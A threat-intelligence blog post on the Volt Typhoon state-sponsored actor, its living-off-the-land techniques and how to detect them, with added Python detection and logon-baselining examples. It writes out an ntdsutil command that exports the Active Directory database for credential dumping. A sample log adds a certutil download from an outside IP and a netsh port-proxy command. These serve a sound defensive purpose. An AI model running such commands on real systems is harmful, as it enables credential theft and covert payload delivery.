Volt Typhoon: Living off the Land
APT Analysis
May 24, 2023 | 13 min read

Shubham Singla

They are inside the wires. Volt Typhoon isn't looking for credit card numbers or trade secrets. They are pre-positioning for war. This state-sponsored actor has infiltrated US critical infrastructure using techniques so stealthy that they change the paradigm of detection.

(Figure: Global Threat Map)

Executive Summary

In mid-2023, Microsoft, the NSA, and CISA released a joint advisory about a threat actor named Volt Typhoon. Attributed with high confidence to the People's Republic of China (PRC), this group has been active since mid-2021.

Their targets are strategic: Communications, Manufacturing, Utility, Transportation, Construction, Maritime, Government, IT, and Education sectors. Specifically, they targeted infrastructure in Guam—a critical US naval outpost in the Pacific.

The goal? "Disruption of critical communications infrastructure between the United States and Asia region during future crises."

Living off the Land (LotL)

Volt Typhoon's tradecraft is defined by Living off the Land. They rarely download custom malware, which keeps them hidden from antivirus scanners. Instead, they use the tools the administrators have already installed on the system.

The Toolkit of Invisibility

  • PowerShell: Used for information gathering and execution.
  • WMI (Windows Management Instrumentation): Used to move laterally between computers.
  • Netsh: Used to set up port forwarding and proxies.
  • Certutil: Used to download files (ironically, it is a certificate utility).

By using these tools, their activity blends in with normal system administration. To a junior SOC analyst, a PowerShell session running net user looks like an admin checking an account, not an attacker performing reconnaissance.

The SOHO Router Botnet

To hide their origin, Volt Typhoon compromised thousands of Small Office/Home Office (SOHO) routers. Brands like ASUS, Cisco, D-Link, and Netgear were targeted. These devices are often forgotten, unpatched, and sit directly on the internet.

The attackers used these routers as a proxy mesh. When they attacked a US power plant, the traffic didn't come from a Shanghai IP address; it came from a residential IP in Ohio. This "operational relay box" (KV-botnet) made geo-blocking useless.

(Figure: Botnet Visualization)

Technical Deep Dive: The Attack Anatomy

Understanding the specific mechanics of the attack is crucial for engineers. Most advanced threats follow the Cyber Kill Chain model:

RECONNAISSANCE: The attacker gathers information on the target. This can be passive (OSINT) or active (port scanning).

WEAPONIZATION: Creating a deliverable payload (e.g., a malicious PDF or Office macro).

DELIVERY: Transmitting the weapon to the target (e.g., via Phishing or USB).

EXPLOITATION: Triggering the payload to exploit a vulnerability (e.g., CVE-2023-xyz).

INSTALLATION: Establishing a backdoor or persistence mechanism (e.g., a scheduled task or registry key).

COMMAND & CONTROL (C2): The compromised system calls home to the attacker server for instructions.

ACTIONS ON OBJECTIVES: The attacker achieves their goal (encryption, extensive data exfiltration, destruction).

Detection Challenges

Detecting Volt Typhoon requires Behavioral Analysis. You cannot search for a file hash because there is no file. You have to search for the pattern of commands.

For example, ntdsutil.exe is a legitimate tool for Active Directory maintenance. However, if it creates a snapshot of the database and saves it to a Temp folder, that is a high-fidelity indicator of credential theft.

// Suspicious command: creating a shadow copy (IFM export) of the AD database for credential dumping
cmd.exe /c ntdsutil "ac i ntds" "ifm" "create full c:\programdata\microsoft\recovery" q q
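The command above is one instance of the pattern. The following is an added example (mine, not code from the original post or from any vendor) of the behavioural approach this section describes: a handful of rules over process-creation records for the tools named in the toolkit section (PowerShell account enumeration, WMI remote process creation, netsh port proxying, certutil downloads) plus the ntdsutil export, with a per-host score so that a single hit reads as admin noise and a chain of hits escalates. The log records, hosts, users, addresses and the alert threshold are all constructed for the example.

```python
"""Behavioural detection of Living-off-the-Land activity from process-creation logs.

Added example, not code from the original post or from any vendor. The records in
SAMPLE_LOG are constructed (pipe-delimited: host|user|parent image|image|command
line, the fields a Security Event ID 4688 record carries); the rules are
illustrative patterns for the tools the post names. A SIEM/EDR export would be
fed into the same functions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample records (invented hosts, users and addresses).
SAMPLE_LOG = """\
DC01|CORP\\svc_backup|cmd.exe|ntdsutil.exe|ntdsutil "ac i ntds" "ifm" "create full c:\\programdata\\microsoft\\recovery" q q
DC01|CORP\\svc_backup|cmd.exe|netsh.exe|netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=443
WS-042|CORP\\jsmith|explorer.exe|powershell.exe|powershell.exe -Command "Get-ChildItem C:\\Reports"
WS-042|CORP\\jsmith|cmd.exe|certutil.exe|certutil -urlcache -split -f http://203.0.113.7/update.dat c:\\users\\public\\update.dat
FS01|CORP\\admin1|cmd.exe|ntdsutil.exe|ntdsutil
"""

# (rule name, pattern over the command line, severity). One hit is weak evidence;
# the per-host score below is what turns "admin noise" into an alert.
RULES = [
    ("ntdsutil_ifm_export",
     re.compile(r"\bntdsutil\b.*\b(ac\s+i|activate\s+instance)\s+ntds\b.*\bifm\b.*\bcreate\s+full\b", re.I),
     "high"),
    ("netsh_portproxy",
     re.compile(r"\bnetsh\b.*\binterface\s+portproxy\b.*\badd\b", re.I), "high"),
    ("certutil_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I), "medium"),
    ("wmi_remote_process_create",
     re.compile(r"\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b", re.I), "medium"),
    ("shell_account_recon",
     re.compile(r"\b(powershell|cmd)(\.exe)?\b.*\bnet\s+(user|group|localgroup)\b", re.I), "low"),
]
SEVERITY_WEIGHT = {"low": 1, "medium": 2, "high": 3}
ALERT_THRESHOLD = 3  # assumed tuning value: escalate a host at this cumulative score


def parse_log(text):
    """Turn the pipe-delimited export into ProcessEvent objects (blank lines skipped)."""
    events = []
    for line in text.splitlines():
        if line.strip():
            host, user, parent, image, cmdline = line.split("|", 4)
            events.append(ProcessEvent(host, user, parent, image, cmdline))
    return events


def match_rules(event):
    """Names and severities of every rule whose pattern hits this command line."""
    return [(name, sev) for name, rx, sev in RULES if rx.search(event.command_line)]


def detect(events):
    """Group hits per host and score them.

    Returns (findings, scores, escalated): findings maps host -> [(rule, severity,
    user)], scores maps host -> weighted sum, escalated lists hosts at or above
    ALERT_THRESHOLD. A lone certutil download scores below the bar; an ntdsutil IFM
    export followed by a netsh portproxy on the same host does not.
    """
    findings = defaultdict(list)
    for ev in events:
        for name, sev in match_rules(ev):
            findings[ev.host].append((name, sev, ev.user))
    scores = {h: sum(SEVERITY_WEIGHT[s] for _, s, _ in hits) for h, hits in findings.items()}
    escalated = sorted(h for h, s in scores.items() if s >= ALERT_THRESHOLD)
    return dict(findings), scores, escalated


if __name__ == "__main__":
    findings, scores, escalated = detect(parse_log(SAMPLE_LOG))
    for host in sorted(scores):
        flag = "ESCALATE" if host in escalated else "watch"
        print(f"{host:8} score={scores[host]} {flag}: {[n for n, _, _ in findings[host]]}")
```

Run on the constructed records, DC01 is escalated (IFM export followed by a port proxy), WS-042 stays on the watch list with a single download hit, and the bare interactive ntdsutil on FS01 produces nothing. The regexes are deliberately loose about quoting and abbreviations; in practice you would also key on parent process and user, which the ProcessEvent fields already carry.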

Regulatory and Compliance Context

In the aftermath of such incidents, organizations must navigate a complex web of regulatory obligations. Failure to comply can result in severe fines and reputational damage.

GDPR (General Data Protection Regulation)

For organizations operating in or serving citizens of the EU, GDPR mandates strict breach notification timelines (usually within 72 hours). Article 32 requires the implementation of appropriate technical and organizational measures to ensure a level of security appropriate to the risk.

NIST Cybersecurity Framework

The NIST framework provides a standard for critical infrastructure. It is organized around five core functions: Identify, Protect, Detect, Respond, and Recover. This incident highlights failures primarily in the 'Protect' and 'Detect' functions.

Local Legislation (Privacy Act 1988 - Australia)

Under the Notifiable Data Breaches (NDB) scheme, organizations must notify the OAIC and affected individuals if a data breach is likely to result in serious harm. This includes unauthorized access to personal information.

The Geopolitical Context

The targeting of Guam is significant. In the event of a conflict over Taiwan, Guam would be a primary staging ground for US Air Force and Naval operations. By embedding themselves in the water and power utilities of the island, Volt Typhoon could theoretically "turn off the lights" at a critical moment for logistics, delaying a US response.

This moves cybersecurity from the realm of espionage (stealing secrets) to kinetic warfare preparation (sabotage). It is a violation of international norms regarding critical infrastructure targeting.

Standard Incident Response Procedures

A robust Incident Response Plan (IRP) is the best defense against chaos. The SANS Institute outlines a six-step process:

  1. Preparation: Training, tooling, and dry runs (tabletop exercises).
  2. Identification: Detecting the deviation from normal behavior and determining the scope.
  3. Containment: Short-term mitigation (isolating the system) and long-term containment (patching).
  4. Eradication: Removing the root cause (malware, compromised accounts).
  5. Recovery: Restoring systems to normal operation and monitoring for recurrence.
  6. Lessons Learned: Post-incident analysis to improve future response.

How to Defend

Defense against LotL requires rigorous logging:

  1. Enable PowerShell Logging: Script Block Logging (Event ID 4104) captures the actual code executed, even if it is obfuscated.
  2. Monitor Account Usage: Why is the "Backup_Admin" account logging in at 3 AM from a VPN IP?
  3. Patch your Edge: Those SOHO routers and VPN concentrators (like Fortinet and Ivanti) are the front door. Patch them.
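Item 2 above is a baselining question rather than a signature question: 3 AM may be perfectly normal for a backup account, while a VPN source address for that same account is not. As an added example (mine, not code from the original post), the following Python compares constructed logon records, standing in for the fields of Security Event ID 4624, against each account's own history. The VPN address range, the accounts and the timestamps are assumed.

```python
"""Account-usage baselining for logon events.

Added example, not code from the original post. HISTORY and NEW_EVENTS are
constructed (account, ISO timestamp, source IP) tuples standing in for the
fields of Security Event ID 4624 records; VPN_POOL is an assumed VPN address
range. The point is the post's question, "why is Backup_Admin logging in at
3 AM from a VPN IP?": the hour alone may be normal for a backup account, so
each new logon is compared with what that account has done before.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime

VPN_POOL = ipaddress.ip_network("10.200.0.0/16")  # assumed VPN client pool

# Constructed history of past logons (invented accounts and addresses).
HISTORY = [
    ("Backup_Admin", "2023-05-01T02:05:00", "10.10.0.50"),  # backup server, nightly
    ("Backup_Admin", "2023-05-02T02:07:00", "10.10.0.50"),
    ("Backup_Admin", "2023-05-03T03:01:00", "10.10.0.50"),
    ("jsmith", "2023-05-01T08:55:00", "10.10.5.20"),        # office workstation
    ("jsmith", "2023-05-01T13:10:00", "10.10.5.20"),
    ("jsmith", "2023-05-02T17:40:00", "10.200.3.9"),        # jsmith does use the VPN
    ("jsmith", "2023-05-03T09:30:00", "10.10.5.20"),
]

# Constructed new logons to evaluate against the baseline.
NEW_EVENTS = [
    ("Backup_Admin", "2023-05-10T03:12:00", "10.200.1.15"),  # 3 AM is normal, VPN is not
    ("jsmith", "2023-05-10T09:30:00", "10.10.5.20"),          # ordinary
    ("jsmith", "2023-05-10T22:45:00", "10.200.3.9"),          # VPN is normal, 22:45 is not
    ("tmp_svc", "2023-05-10T11:00:00", "10.10.5.21"),          # account never seen before
]


def build_baseline(history):
    """Per account: the hours of day seen and whether VPN logons have occurred."""
    hours = defaultdict(set)
    vpn_seen = defaultdict(bool)
    for account, ts, ip in history:
        hours[account].add(datetime.fromisoformat(ts).hour)
        if ipaddress.ip_address(ip) in VPN_POOL:
            vpn_seen[account] = True
    return hours, vpn_seen


def logon_reasons(account, ts, ip, hours, vpn_seen):
    """Reasons this logon deviates from the account's baseline (empty list if none)."""
    reasons = []
    hour = datetime.fromisoformat(ts).hour
    if account not in hours:
        reasons.append("no baseline for account")
    elif hour not in hours[account]:
        reasons.append(f"hour {hour:02d} outside baseline")
    if ipaddress.ip_address(ip) in VPN_POOL and not vpn_seen[account]:
        reasons.append("first VPN logon")
    return reasons


def find_anomalies(history, events):
    """Evaluate each new logon; return only those with at least one reason."""
    hours, vpn_seen = build_baseline(history)
    anomalies = []
    for account, ts, ip in events:
        reasons = logon_reasons(account, ts, ip, hours, vpn_seen)
        if reasons:
            anomalies.append({"account": account, "time": ts, "source": ip, "reasons": reasons})
    return anomalies


if __name__ == "__main__":
    for a in find_anomalies(HISTORY, NEW_EVENTS):
        print(f"{a['account']:13} {a['time']} from {a['source']:12} -> {', '.join(a['reasons'])}")
```

On the constructed data the backup account is flagged only for the VPN source, jsmith only for the late hour, and the never-seen account for having no baseline at all. An exact set of hours is a crude baseline for a week of history; with real 4624 volume you would widen it to a tolerance window and add source host and logon type to the profile.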

Comprehensive Mitigation Strategies

To prevent recurrence, a defense-in-depth approach is required. This involves layering security controls so that if one fails, another catches the threat.

  • Network Segmentation: Isolate critical assets in separate VLANs with strict firewall rules (East-West traffic inspection).
  • Endpoint Detection and Response (EDR): Deploy agents that can detect behavioral anomalies, not just file signatures.
  • Identity and Access Management (IAM): Enforce Least Privilege and MFA everywhere. Review access logs regularly.
  • Regular Audits: Conduct penetration testing and vulnerability scanning (using tools like Nessus or Burp Suite) at least quarterly.

Volt Typhoon is a reminder that the adversary is watching, waiting, and preparing. They are not smash-and-grab robbers; they are squatters in the basement. Evicting them requires hunting them down, room by room.